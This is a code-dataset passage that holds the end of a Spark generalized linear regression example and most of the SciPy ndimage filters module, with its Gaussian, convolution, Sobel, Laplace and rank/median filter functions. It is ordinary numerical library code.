.load("data/mllib/sample_linear_regression_data.txt")
glr = GeneralizedLinearRegression(family="gaussian", link="identity", maxIter=10, regParam=0.3)
# Fit the model
model = glr.fit(dataset)
# Print the coefficients and intercept for generalized linear regression model
print("Coefficients: " + str(model.coefficients))
print("Intercept: " + str(model.intercept))
# Summarize the model over the training set and print out some metrics
summary = model.summary
print("Coefficient Standard Errors: " + str(summary.coefficientStandardErrors))
print("T Values: " + str(summary.tValues))
print("P Values: " + str(summary.pValues))
print("Dispersion: " + str(summary.dispersion))
print("Null Deviance: " + str(summary.nullDeviance))
print("Residual Degree Of Freedom Null: " + str(summary.residualDegreeOfFreedomNull))
print("Deviance: " + str(summary.deviance))
print("Residual Degree Of Freedom: " + str(summary.residualDegreeOfFreedom))
print("AIC: " + str(summary.aic))
print("Deviance Residuals: ")
summary.residuals().show()
# $example off$
spark.stop()
|
fharenheit/template-spark-app
|
src/main/python/ml/generalized_linear_regression_example.py
|
Python
|
apache-2.0
| 2,506
|
[
"Gaussian"
] |
9a2f4b4205a6797f30345bfa55669ffa6ec6af07fd8c143c4316b6dd6dba9622
|
# Copyright (C) 2003-2005 Peter J. Verveer
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, print_function, absolute_import
import math
import numpy
from . import _ni_support
from . import _nd_image
from scipy.misc import doccer
__all__ = ['correlate1d', 'convolve1d', 'gaussian_filter1d', 'gaussian_filter',
'prewitt', 'sobel', 'generic_laplace', 'laplace',
'gaussian_laplace', 'generic_gradient_magnitude',
'gaussian_gradient_magnitude', 'correlate', 'convolve',
'uniform_filter1d', 'uniform_filter', 'minimum_filter1d',
'maximum_filter1d', 'minimum_filter', 'maximum_filter',
'rank_filter', 'median_filter', 'percentile_filter',
'generic_filter1d', 'generic_filter']
_input_doc = \
"""input : array_like
Input array to filter."""
_axis_doc = \
"""axis : int, optional
The axis of `input` along which to calculate. Default is -1."""
_output_doc = \
"""output : array, optional
The `output` parameter passes an array in which to store the
filter output."""
_size_foot_doc = \
"""size : scalar or tuple, optional
See footprint, below
footprint : array, optional
Either `size` or `footprint` must be defined. `size` gives
the shape that is taken from the input array, at every element
position, to define the input to the filter function.
`footprint` is a boolean array that specifies (implicitly) a
shape, but also which of the elements within this shape will get
passed to the filter function. Thus ``size=(n,m)`` is equivalent
to ``footprint=np.ones((n,m))``. We adjust `size` to the number
of dimensions of the input array, so that, if the input array is
shape (10,10,10), and `size` is 2, then the actual size used is
(2,2,2).
"""
_mode_doc = \
"""mode : {'reflect', 'constant', 'nearest', 'mirror', 'wrap'}, optional
The `mode` parameter determines how the array borders are
handled, where `cval` is the value when mode is equal to
'constant'. Default is 'reflect'"""
_cval_doc = \
"""cval : scalar, optional
Value to fill past edges of input if `mode` is 'constant'. Default
is 0.0"""
_origin_doc = \
"""origin : scalar, optional
The `origin` parameter controls the placement of the filter.
    Default is 0."""
_extra_arguments_doc = \
"""extra_arguments : sequence, optional
Sequence of extra positional arguments to pass to passed function"""
_extra_keywords_doc = \
"""extra_keywords : dict, optional
dict of extra keyword arguments to pass to passed function"""
docdict = {
'input':_input_doc,
'axis':_axis_doc,
'output':_output_doc,
'size_foot':_size_foot_doc,
'mode':_mode_doc,
'cval':_cval_doc,
'origin':_origin_doc,
'extra_arguments':_extra_arguments_doc,
'extra_keywords':_extra_keywords_doc,
}
docfiller = doccer.filldoc(docdict)
@docfiller
def correlate1d(input, weights, axis=-1, output=None, mode="reflect",
cval=0.0, origin=0):
"""Calculate a one-dimensional correlation along the given axis.
The lines of the array along the given axis are correlated with the
given weights.
Parameters
----------
%(input)s
weights : array
One-dimensional sequence of numbers.
%(axis)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
weights = numpy.asarray(weights, dtype=numpy.float64)
if weights.ndim != 1 or weights.shape[0] < 1:
raise RuntimeError('no filter weights given')
if not weights.flags.contiguous:
weights = weights.copy()
axis = _ni_support._check_axis(axis, input.ndim)
if ((len(weights) // 2 + origin < 0) or
(len(weights) // 2 + origin > len(weights))):
raise ValueError('invalid origin')
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.correlate1d(input, weights, axis, output, mode, cval,
origin)
return return_value
@docfiller
def convolve1d(input, weights, axis=-1, output=None, mode="reflect",
cval=0.0, origin=0):
"""Calculate a one-dimensional convolution along the given axis.
The lines of the array along the given axis are convolved with the
given weights.
Parameters
----------
%(input)s
weights : ndarray
One-dimensional sequence of numbers.
%(axis)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
Returns
-------
convolve1d : ndarray
Convolved array with same shape as input
"""
weights = weights[::-1]
origin = -origin
if not len(weights) & 1:
origin -= 1
return correlate1d(input, weights, axis, output, mode, cval, origin)
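# A small numeric sketch of the relationship implemented above: convolution
# flips the weights (and shifts the origin for even-length kernels) before
# correlating, so filtering a unit impulse returns the kernel itself for
# convolution and the reversed kernel for correlation::
#
#     >>> x = numpy.array([0., 0., 1., 0., 0.])  # doctest: +SKIP
#     >>> convolve1d(x, [1., 2., 3.])  # doctest: +SKIP
#     array([ 0.,  1.,  2.,  3.,  0.])
#     >>> correlate1d(x, [1., 2., 3.])  # doctest: +SKIP
#     array([ 0.,  3.,  2.,  1.,  0.])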
@docfiller
def gaussian_filter1d(input, sigma, axis=-1, order=0, output=None,
mode="reflect", cval=0.0):
"""One-dimensional Gaussian filter.
Parameters
----------
%(input)s
sigma : scalar
standard deviation for Gaussian kernel
%(axis)s
order : {0, 1, 2, 3}, optional
An order of 0 corresponds to convolution with a Gaussian
kernel. An order of 1, 2, or 3 corresponds to convolution with
the first, second or third derivatives of a Gaussian. Higher
order derivatives are not implemented
%(output)s
%(mode)s
%(cval)s
Returns
-------
gaussian_filter1d : ndarray
"""
if order not in range(4):
raise ValueError('Order outside 0..3 not implemented')
sd = float(sigma)
    # truncate the filter at 4 standard deviations on each side of the
    # center:
lw = int(4.0 * sd + 0.5)
weights = [0.0] * (2 * lw + 1)
weights[lw] = 1.0
sum = 1.0
sd = sd * sd
# calculate the kernel:
for ii in range(1, lw + 1):
tmp = math.exp(-0.5 * float(ii * ii) / sd)
weights[lw + ii] = tmp
weights[lw - ii] = tmp
sum += 2.0 * tmp
for ii in range(2 * lw + 1):
weights[ii] /= sum
# implement first, second and third order derivatives:
if order == 1: # first derivative
weights[lw] = 0.0
for ii in range(1, lw + 1):
x = float(ii)
tmp = -x / sd * weights[lw + ii]
weights[lw + ii] = -tmp
weights[lw - ii] = tmp
elif order == 2: # second derivative
weights[lw] *= -1.0 / sd
for ii in range(1, lw + 1):
x = float(ii)
tmp = (x * x / sd - 1.0) * weights[lw + ii] / sd
weights[lw + ii] = tmp
weights[lw - ii] = tmp
elif order == 3: # third derivative
weights[lw] = 0.0
sd2 = sd * sd
for ii in range(1, lw + 1):
x = float(ii)
tmp = (3.0 - x * x / sd) * x * weights[lw + ii] / sd2
weights[lw + ii] = -tmp
weights[lw - ii] = tmp
return correlate1d(input, weights, axis, output, mode, cval, 0)
@docfiller
def gaussian_filter(input, sigma, order=0, output=None,
mode="reflect", cval=0.0):
"""Multidimensional Gaussian filter.
Parameters
----------
%(input)s
sigma : scalar or sequence of scalars
Standard deviation for Gaussian kernel. The standard
deviations of the Gaussian filter are given for each axis as a
sequence, or as a single number, in which case it is equal for
all axes.
order : {0, 1, 2, 3} or sequence from same set, optional
The order of the filter along each axis is given as a sequence
of integers, or as a single number. An order of 0 corresponds
to convolution with a Gaussian kernel. An order of 1, 2, or 3
corresponds to convolution with the first, second or third
derivatives of a Gaussian. Higher order derivatives are not
implemented
%(output)s
%(mode)s
%(cval)s
Returns
-------
gaussian_filter : ndarray
Returned array of same shape as `input`.
Notes
-----
The multidimensional filter is implemented as a sequence of
one-dimensional convolution filters. The intermediate arrays are
stored in the same data type as the output. Therefore, for output
types with a limited precision, the results may be imprecise
because intermediate results may be stored with insufficient
precision.
"""
input = numpy.asarray(input)
output, return_value = _ni_support._get_output(output, input)
orders = _ni_support._normalize_sequence(order, input.ndim)
    if not set(orders).issubset(set(range(4))):
        raise ValueError('Order outside 0..3 not implemented')
sigmas = _ni_support._normalize_sequence(sigma, input.ndim)
axes = list(range(input.ndim))
axes = [(axes[ii], sigmas[ii], orders[ii])
for ii in range(len(axes)) if sigmas[ii] > 1e-15]
if len(axes) > 0:
for axis, sigma, order in axes:
gaussian_filter1d(input, sigma, axis, order, output,
mode, cval)
input = output
else:
output[...] = input[...]
return return_value
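# --- Editor's note: hedged sketch (not in the original module) showing the
# per-axis sigma behaviour documented above: a scalar sigma blurs
# isotropically, a sequence blurs each axis differently. The impulse image
# and sigma values are illustrative assumptions.
def _example_gaussian_filter():
    import numpy as np
    img = np.zeros((64, 64))
    img[32, 32] = 1.0                            # unit impulse
    iso = gaussian_filter(img, sigma=2)          # circular Gaussian response
    aniso = gaussian_filter(img, sigma=(1, 4))   # elongated along axis 1
    return iso, aniso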
@docfiller
def prewitt(input, axis=-1, output=None, mode="reflect", cval=0.0):
"""Calculate a Prewitt filter.
Parameters
----------
%(input)s
%(axis)s
%(output)s
%(mode)s
%(cval)s
"""
input = numpy.asarray(input)
axis = _ni_support._check_axis(axis, input.ndim)
output, return_value = _ni_support._get_output(output, input)
correlate1d(input, [-1, 0, 1], axis, output, mode, cval, 0)
axes = [ii for ii in range(input.ndim) if ii != axis]
for ii in axes:
        correlate1d(output, [1, 1, 1], ii, output, mode, cval, 0)
return return_value
@docfiller
def sobel(input, axis=-1, output=None, mode="reflect", cval=0.0):
"""Calculate a Sobel filter.
Parameters
----------
%(input)s
%(axis)s
%(output)s
%(mode)s
%(cval)s
"""
input = numpy.asarray(input)
axis = _ni_support._check_axis(axis, input.ndim)
output, return_value = _ni_support._get_output(output, input)
correlate1d(input, [-1, 0, 1], axis, output, mode, cval, 0)
axes = [ii for ii in range(input.ndim) if ii != axis]
for ii in axes:
correlate1d(output, [1, 2, 1], ii, output, mode, cval, 0)
return return_value
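# --- Editor's note: hedged sketch (not in the original module). A common
# use of the separable Sobel passes above is to combine the two axis
# derivatives into an edge-strength map; the test image is an assumption.
def _example_sobel_edges():
    import numpy as np
    img = np.outer(np.hanning(32), np.hanning(32))
    sx = sobel(img, axis=0)    # derivative along rows
    sy = sobel(img, axis=1)    # derivative along columns
    return np.hypot(sx, sy)    # gradient magnitude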
@docfiller
def generic_laplace(input, derivative2, output=None, mode="reflect",
cval=0.0,
extra_arguments=(),
                    extra_keywords=None):
"""N-dimensional Laplace filter using a provided second derivative function
Parameters
----------
%(input)s
derivative2 : callable
Callable with the following signature::
derivative2(input, axis, output, mode, cval,
*extra_arguments, **extra_keywords)
See `extra_arguments`, `extra_keywords` below.
%(output)s
%(mode)s
%(cval)s
%(extra_keywords)s
%(extra_arguments)s
"""
if extra_keywords is None:
extra_keywords = {}
input = numpy.asarray(input)
output, return_value = _ni_support._get_output(output, input)
axes = list(range(input.ndim))
if len(axes) > 0:
derivative2(input, axes[0], output, mode, cval,
*extra_arguments, **extra_keywords)
for ii in range(1, len(axes)):
tmp = derivative2(input, axes[ii], output.dtype, mode, cval,
*extra_arguments, **extra_keywords)
output += tmp
else:
output[...] = input[...]
return return_value
@docfiller
def laplace(input, output=None, mode="reflect", cval=0.0):
"""N-dimensional Laplace filter based on approximate second derivatives.
Parameters
----------
%(input)s
%(output)s
%(mode)s
%(cval)s
"""
def derivative2(input, axis, output, mode, cval):
return correlate1d(input, [1, -2, 1], axis, output, mode, cval, 0)
return generic_laplace(input, derivative2, output, mode, cval)
@docfiller
def gaussian_laplace(input, sigma, output=None, mode="reflect",
cval=0.0):
"""Multidimensional Laplace filter using gaussian second derivatives.
Parameters
----------
%(input)s
sigma : scalar or sequence of scalars
The standard deviations of the Gaussian filter are given for
each axis as a sequence, or as a single number, in which case
it is equal for all axes.
%(output)s
%(mode)s
%(cval)s
"""
input = numpy.asarray(input)
def derivative2(input, axis, output, mode, cval, sigma):
order = [0] * input.ndim
order[axis] = 2
return gaussian_filter(input, sigma, order, output, mode, cval)
return generic_laplace(input, derivative2, output, mode, cval,
extra_arguments=(sigma,))
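# --- Editor's note: hedged sketch (not in the original module). The
# Laplacian-of-Gaussian built above changes sign across intensity edges,
# so its zero crossings outline the square below; sigma is illustrative.
def _example_gaussian_laplace():
    import numpy as np
    img = np.zeros((64, 64))
    img[24:40, 24:40] = 1.0
    return gaussian_laplace(img, sigma=2)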
@docfiller
def generic_gradient_magnitude(input, derivative, output=None,
mode="reflect", cval=0.0,
                               extra_arguments=(), extra_keywords=None):
"""Gradient magnitude using a provided gradient function.
Parameters
----------
%(input)s
derivative : callable
Callable with the following signature::
derivative(input, axis, output, mode, cval,
*extra_arguments, **extra_keywords)
See `extra_arguments`, `extra_keywords` below.
`derivative` can assume that `input` and `output` are ndarrays.
Note that the output from `derivative` is modified inplace;
be careful to copy important inputs before returning them.
%(output)s
%(mode)s
%(cval)s
%(extra_keywords)s
%(extra_arguments)s
"""
if extra_keywords is None:
extra_keywords = {}
input = numpy.asarray(input)
output, return_value = _ni_support._get_output(output, input)
axes = list(range(input.ndim))
if len(axes) > 0:
derivative(input, axes[0], output, mode, cval,
*extra_arguments, **extra_keywords)
numpy.multiply(output, output, output)
for ii in range(1, len(axes)):
tmp = derivative(input, axes[ii], output.dtype, mode, cval,
*extra_arguments, **extra_keywords)
numpy.multiply(tmp, tmp, tmp)
output += tmp
        # This allows the sqrt to work with a different default casting.
        # Note: compare parsed version components rather than raw strings,
        # since lexicographic comparison misorders e.g. '1.10.0' and '1.6.1'.
        np_version = tuple(int(p) for p in
                           numpy.version.short_version.split('.')[:3])
        if np_version > (1, 6, 1):
            numpy.sqrt(output, output, casting='unsafe')
        else:
            numpy.sqrt(output, output)
else:
output[...] = input[...]
return return_value
@docfiller
def gaussian_gradient_magnitude(input, sigma, output=None,
mode="reflect", cval=0.0):
"""Multidimensional gradient magnitude using Gaussian derivatives.
Parameters
----------
%(input)s
sigma : scalar or sequence of scalars
The standard deviations of the Gaussian filter are given for
each axis as a sequence, or as a single number, in which case
        it is equal for all axes.
%(output)s
%(mode)s
%(cval)s
"""
input = numpy.asarray(input)
def derivative(input, axis, output, mode, cval, sigma):
order = [0] * input.ndim
order[axis] = 1
return gaussian_filter(input, sigma, order, output, mode, cval)
return generic_gradient_magnitude(input, derivative, output, mode,
cval, extra_arguments=(sigma,))
def _correlate_or_convolve(input, weights, output, mode, cval, origin,
convolution):
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
origins = _ni_support._normalize_sequence(origin, input.ndim)
weights = numpy.asarray(weights, dtype=numpy.float64)
wshape = [ii for ii in weights.shape if ii > 0]
if len(wshape) != input.ndim:
raise RuntimeError('filter weights array has incorrect shape.')
if convolution:
weights = weights[tuple([slice(None, None, -1)] * weights.ndim)]
for ii in range(len(origins)):
origins[ii] = -origins[ii]
if not weights.shape[ii] & 1:
origins[ii] -= 1
for origin, lenw in zip(origins, wshape):
if (lenw // 2 + origin < 0) or (lenw // 2 + origin > lenw):
raise ValueError('invalid origin')
if not weights.flags.contiguous:
weights = weights.copy()
output, return_value = _ni_support._get_output(output, input)
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.correlate(input, weights, output, mode, cval, origins)
return return_value
@docfiller
def correlate(input, weights, output=None, mode='reflect', cval=0.0,
origin=0):
"""
Multi-dimensional correlation.
The array is correlated with the given kernel.
Parameters
----------
input : array-like
input array to filter
weights : ndarray
array of weights, same number of dimensions as input
output : array, optional
The ``output`` parameter passes an array in which to store the
filter output.
mode : {'reflect','constant','nearest','mirror', 'wrap'}, optional
The ``mode`` parameter determines how the array borders are
handled, where ``cval`` is the value when mode is equal to
'constant'. Default is 'reflect'
cval : scalar, optional
Value to fill past edges of input if ``mode`` is 'constant'. Default
is 0.0
origin : scalar, optional
The ``origin`` parameter controls the placement of the filter.
Default 0
See Also
--------
convolve : Convolve an image with a kernel.
"""
return _correlate_or_convolve(input, weights, output, mode, cval,
origin, False)
@docfiller
def convolve(input, weights, output=None, mode='reflect', cval=0.0,
origin=0):
"""
Multidimensional convolution.
The array is convolved with the given kernel.
Parameters
----------
input : array_like
Input array to filter.
weights : array_like
Array of weights, same number of dimensions as input
output : ndarray, optional
The `output` parameter passes an array in which to store the
filter output.
mode : {'reflect','constant','nearest','mirror', 'wrap'}, optional
the `mode` parameter determines how the array borders are
handled. For 'constant' mode, values beyond borders are set to be
`cval`. Default is 'reflect'.
cval : scalar, optional
Value to fill past edges of input if `mode` is 'constant'. Default
is 0.0
origin : array_like, optional
The `origin` parameter controls the placement of the filter.
Default is 0.
Returns
-------
result : ndarray
The result of convolution of `input` with `weights`.
See Also
--------
correlate : Correlate an image with a kernel.
Notes
-----
Each value in result is :math:`C_i = \\sum_j{I_{i+j-k} W_j}`, where
W is the `weights` kernel,
j is the n-D spatial index over :math:`W`,
I is the `input` and k is the coordinate of the center of
W, specified by `origin` in the input parameters.
Examples
--------
    Perhaps the simplest case to understand is ``mode='constant', cval=0.0``,
    because in this case borders (i.e. where the `weights` kernel, centered
    on any one value, extends beyond an edge of `input`) are treated as zeros.
>>> a = np.array([[1, 2, 0, 0],
    ...               [5, 3, 0, 4],
    ...               [0, 0, 0, 7],
    ...               [9, 3, 0, 0]])
>>> k = np.array([[1,1,1],[1,1,0],[1,0,0]])
>>> from scipy import ndimage
>>> ndimage.convolve(a, k, mode='constant', cval=0.0)
array([[11, 10, 7, 4],
[10, 3, 11, 11],
[15, 12, 14, 7],
[12, 3, 7, 0]])
Setting ``cval=1.0`` is equivalent to padding the outer edge of `input`
with 1.0's (and then extracting only the original region of the result).
>>> ndimage.convolve(a, k, mode='constant', cval=1.0)
array([[13, 11, 8, 7],
[11, 3, 11, 14],
[16, 12, 14, 10],
[15, 6, 10, 5]])
With ``mode='reflect'`` (the default), outer values are reflected at the
edge of `input` to fill in missing values.
>>> b = np.array([[2, 0, 0],
    ...               [1, 0, 0],
    ...               [0, 0, 0]])
>>> k = np.array([[0,1,0],[0,1,0],[0,1,0]])
>>> ndimage.convolve(b, k, mode='reflect')
array([[5, 0, 0],
[3, 0, 0],
[1, 0, 0]])
This includes diagonally at the corners.
>>> k = np.array([[1,0,0],[0,1,0],[0,0,1]])
>>> ndimage.convolve(b, k)
array([[4, 2, 0],
[3, 2, 0],
[1, 1, 0]])
    With ``mode='nearest'``, the single value nearest to an edge of
    `input` is repeated as many times as needed to match the overlapping
    `weights`.
    >>> c = np.array([[2, 0, 1],
    ...               [1, 0, 0],
    ...               [0, 0, 0]])
    >>> k = np.array([[0, 1, 0],
    ...               [0, 1, 0],
    ...               [0, 1, 0],
    ...               [0, 1, 0],
    ...               [0, 1, 0]])
>>> ndimage.convolve(c, k, mode='nearest')
array([[7, 0, 3],
[5, 0, 2],
[3, 0, 1]])
"""
return _correlate_or_convolve(input, weights, output, mode, cval,
origin, True)
@docfiller
def uniform_filter1d(input, size, axis=-1, output=None,
mode="reflect", cval=0.0, origin=0):
"""Calculate a one-dimensional uniform filter along the given axis.
The lines of the array along the given axis are filtered with a
uniform filter of given size.
Parameters
----------
%(input)s
size : integer
length of uniform filter
%(axis)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
axis = _ni_support._check_axis(axis, input.ndim)
if size < 1:
raise RuntimeError('incorrect filter size')
output, return_value = _ni_support._get_output(output, input)
if (size // 2 + origin < 0) or (size // 2 + origin >= size):
raise ValueError('invalid origin')
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.uniform_filter1d(input, size, axis, output, mode, cval,
origin)
return return_value
@docfiller
def uniform_filter(input, size=3, output=None, mode="reflect",
cval=0.0, origin=0):
"""Multi-dimensional uniform filter.
Parameters
----------
%(input)s
size : int or sequence of ints
The sizes of the uniform filter are given for each axis as a
sequence, or as a single number, in which case the size is
equal for all axes.
%(output)s
%(mode)s
%(cval)s
%(origin)s
Notes
-----
The multi-dimensional filter is implemented as a sequence of
one-dimensional uniform filters. The intermediate arrays are stored
in the same data type as the output. Therefore, for output types
with a limited precision, the results may be imprecise because
intermediate results may be stored with insufficient precision.
"""
input = numpy.asarray(input)
output, return_value = _ni_support._get_output(output, input)
sizes = _ni_support._normalize_sequence(size, input.ndim)
origins = _ni_support._normalize_sequence(origin, input.ndim)
axes = list(range(input.ndim))
axes = [(axes[ii], sizes[ii], origins[ii])
for ii in range(len(axes)) if sizes[ii] > 1]
if len(axes) > 0:
for axis, size, origin in axes:
uniform_filter1d(input, int(size), axis, output, mode,
cval, origin)
input = output
else:
output[...] = input[...]
return return_value
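# --- Editor's note: hedged sketch (not in the original module) of the
# separable box blur described in the Notes above; size=5 means a 5x5
# local mean and is an illustrative choice.
def _example_uniform_filter():
    import numpy as np
    img = np.random.random((32, 32))
    return uniform_filter(img, size=5)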
@docfiller
def minimum_filter1d(input, size, axis=-1, output=None,
mode="reflect", cval=0.0, origin=0):
"""Calculate a one-dimensional minimum filter along the given axis.
The lines of the array along the given axis are filtered with a
minimum filter of given size.
Parameters
----------
%(input)s
size : int
length along which to calculate 1D minimum
%(axis)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
axis = _ni_support._check_axis(axis, input.ndim)
if size < 1:
raise RuntimeError('incorrect filter size')
output, return_value = _ni_support._get_output(output, input)
if (size // 2 + origin < 0) or (size // 2 + origin >= size):
raise ValueError('invalid origin')
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.min_or_max_filter1d(input, size, axis, output, mode, cval,
origin, 1)
return return_value
@docfiller
def maximum_filter1d(input, size, axis=-1, output=None,
mode="reflect", cval=0.0, origin=0):
"""Calculate a one-dimensional maximum filter along the given axis.
The lines of the array along the given axis are filtered with a
maximum filter of given size.
Parameters
----------
%(input)s
size : int
Length along which to calculate the 1-D maximum.
%(axis)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
axis = _ni_support._check_axis(axis, input.ndim)
if size < 1:
raise RuntimeError('incorrect filter size')
output, return_value = _ni_support._get_output(output, input)
if (size // 2 + origin < 0) or (size // 2 + origin >= size):
raise ValueError('invalid origin')
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.min_or_max_filter1d(input, size, axis, output, mode, cval,
origin, 0)
return return_value
def _min_or_max_filter(input, size, footprint, structure, output, mode,
cval, origin, minimum):
if structure is None:
if footprint is None:
if size is None:
raise RuntimeError("no footprint provided")
separable = True
else:
footprint = numpy.asarray(footprint)
footprint = footprint.astype(bool)
            if numpy.alltrue(numpy.ravel(footprint), axis=0):
size = footprint.shape
footprint = None
separable = True
else:
separable = False
else:
structure = numpy.asarray(structure, dtype=numpy.float64)
separable = False
if footprint is None:
footprint = numpy.ones(structure.shape, bool)
else:
footprint = numpy.asarray(footprint)
footprint = footprint.astype(bool)
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
origins = _ni_support._normalize_sequence(origin, input.ndim)
if separable:
sizes = _ni_support._normalize_sequence(size, input.ndim)
axes = list(range(input.ndim))
axes = [(axes[ii], sizes[ii], origins[ii])
for ii in range(len(axes)) if sizes[ii] > 1]
if minimum:
filter_ = minimum_filter1d
else:
filter_ = maximum_filter1d
if len(axes) > 0:
for axis, size, origin in axes:
filter_(input, int(size), axis, output, mode, cval, origin)
input = output
else:
output[...] = input[...]
else:
fshape = [ii for ii in footprint.shape if ii > 0]
if len(fshape) != input.ndim:
raise RuntimeError('footprint array has incorrect shape.')
for origin, lenf in zip(origins, fshape):
if (lenf // 2 + origin < 0) or (lenf // 2 + origin >= lenf):
raise ValueError('invalid origin')
if not footprint.flags.contiguous:
footprint = footprint.copy()
if structure is not None:
if len(structure.shape) != input.ndim:
raise RuntimeError('structure array has incorrect shape')
if not structure.flags.contiguous:
structure = structure.copy()
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.min_or_max_filter(input, footprint, structure, output,
mode, cval, origins, minimum)
return return_value
@docfiller
def minimum_filter(input, size=None, footprint=None, output=None,
mode="reflect", cval=0.0, origin=0):
"""Calculates a multi-dimensional minimum filter.
Parameters
----------
%(input)s
%(size_foot)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
return _min_or_max_filter(input, size, footprint, None, output, mode,
cval, origin, 1)
@docfiller
def maximum_filter(input, size=None, footprint=None, output=None,
mode="reflect", cval=0.0, origin=0):
"""Calculates a multi-dimensional maximum filter.
Parameters
----------
%(input)s
%(size_foot)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
return _min_or_max_filter(input, size, footprint, None, output, mode,
cval, origin, 0)
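# --- Editor's note: hedged sketch (not in the original module). Comparing
# an array with its own maximum filter is a standard way to flag local
# maxima; the 3x3 window below is an illustrative assumption.
def _example_local_maxima():
    import numpy as np
    img = np.random.random((32, 32))
    return img == maximum_filter(img, size=3)   # True at local maxima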
def _rank_filter(input, rank, size=None, footprint=None, output=None,
mode="reflect", cval=0.0, origin=0, operation='rank'):
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
origins = _ni_support._normalize_sequence(origin, input.ndim)
if footprint is None:
if size is None:
raise RuntimeError("no footprint or filter size provided")
sizes = _ni_support._normalize_sequence(size, input.ndim)
footprint = numpy.ones(sizes, dtype=bool)
else:
footprint = numpy.asarray(footprint, dtype=bool)
fshape = [ii for ii in footprint.shape if ii > 0]
if len(fshape) != input.ndim:
raise RuntimeError('filter footprint array has incorrect shape.')
for origin, lenf in zip(origins, fshape):
if (lenf // 2 + origin < 0) or (lenf // 2 + origin >= lenf):
raise ValueError('invalid origin')
if not footprint.flags.contiguous:
footprint = footprint.copy()
filter_size = numpy.where(footprint, 1, 0).sum()
if operation == 'median':
rank = filter_size // 2
elif operation == 'percentile':
percentile = rank
if percentile < 0.0:
percentile += 100.0
if percentile < 0 or percentile > 100:
raise RuntimeError('invalid percentile')
if percentile == 100.0:
rank = filter_size - 1
else:
rank = int(float(filter_size) * percentile / 100.0)
if rank < 0:
rank += filter_size
if rank < 0 or rank >= filter_size:
raise RuntimeError('rank not within filter footprint size')
if rank == 0:
return minimum_filter(input, None, footprint, output, mode, cval,
origins)
elif rank == filter_size - 1:
return maximum_filter(input, None, footprint, output, mode, cval,
origins)
else:
output, return_value = _ni_support._get_output(output, input)
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.rank_filter(input, rank, footprint, output, mode, cval,
origins)
return return_value
@docfiller
def rank_filter(input, rank, size=None, footprint=None, output=None,
mode="reflect", cval=0.0, origin=0):
"""Calculates a multi-dimensional rank filter.
Parameters
----------
%(input)s
rank : integer
        The rank parameter may be less than zero, i.e., rank = -1
indicates the largest element.
%(size_foot)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
return _rank_filter(input, rank, size, footprint, output, mode, cval,
origin, 'rank')
@docfiller
def median_filter(input, size=None, footprint=None, output=None,
mode="reflect", cval=0.0, origin=0):
"""
Calculates a multidimensional median filter.
Parameters
----------
%(input)s
%(size_foot)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
Returns
-------
median_filter : ndarray
Return of same shape as `input`.
"""
return _rank_filter(input, 0, size, footprint, output, mode, cval,
origin, 'median')
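# --- Editor's note: hedged sketch (not in the original module). The rank
# machinery above makes median_filter effective against salt-and-pepper
# noise; the noise fractions and window size are illustrative assumptions.
def _example_median_denoise():
    import numpy as np
    rng = np.random.RandomState(0)
    img = 0.5 * np.ones((32, 32))
    img[rng.random_sample(img.shape) < 0.05] = 1.0   # salt
    img[rng.random_sample(img.shape) < 0.05] = 0.0   # pepper
    return median_filter(img, size=3)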
@docfiller
def percentile_filter(input, percentile, size=None, footprint=None,
output=None, mode="reflect", cval=0.0, origin=0):
"""Calculates a multi-dimensional percentile filter.
Parameters
----------
%(input)s
percentile : scalar
        The percentile parameter may be less than zero, i.e.,
percentile = -20 equals percentile = 80
%(size_foot)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
return _rank_filter(input, percentile, size, footprint, output, mode,
cval, origin, 'percentile')
@docfiller
def generic_filter1d(input, function, filter_size, axis=-1,
output=None, mode="reflect", cval=0.0, origin=0,
